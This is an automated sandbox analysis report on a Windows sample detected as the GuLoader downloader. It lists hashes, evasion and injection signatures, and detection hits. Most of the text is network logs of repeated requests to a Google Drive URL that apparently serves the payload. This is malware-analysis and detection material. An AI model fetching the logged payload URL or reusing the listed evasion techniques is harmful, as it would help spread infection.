Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Osb7hkGfAb.exe

Overview

General Information

Sample name:Osb7hkGfAb.exe
renamed because original name is a hash value
Original sample name:ad1dfc910b1815aea7983124549d2c04376db9b2249b99e3e672b91df91bfec6.exe
Analysis ID:1587621
MD5:a09950fd9af3c4e3ff6f778ab5d8ce0f
SHA1:043462f3e5a9b3133908c39e6c3fd8a4f0cade1b
SHA256:ad1dfc910b1815aea7983124549d2c04376db9b2249b99e3e672b91df91bfec6
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Osb7hkGfAb.exe (PID: 4464 cmdline: "C:\Users\user\Desktop\Osb7hkGfAb.exe" MD5: A09950FD9AF3C4E3FF6F778AB5D8CE0F)
    • Osb7hkGfAb.exe (PID: 2900 cmdline: "C:\Users\user\Desktop\Osb7hkGfAb.exe" MD5: A09950FD9AF3C4E3FF6F778AB5D8CE0F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3327433008.00000000017C6000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000002.2779618167.0000000002A16000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T16:02:25.047759+010028032702Potentially Bad Traffic192.168.2.1049708142.250.184.238443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: Osb7hkGfAb.exeAvira: detected
      Multi AV Scanner detection for submitted file
      Source: Osb7hkGfAb.exeReversingLabs: Detection: 75%
      Source: Osb7hkGfAb.exeVirustotal: Detection: 68%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: Osb7hkGfAb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.10:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49780 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49981 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.10:49984 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49985 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.10:49988 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49991 version: TLS 1.2
      Source: Osb7hkGfAb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: mshtml.pdbUGP source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49708 -> 142.250.184.238:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
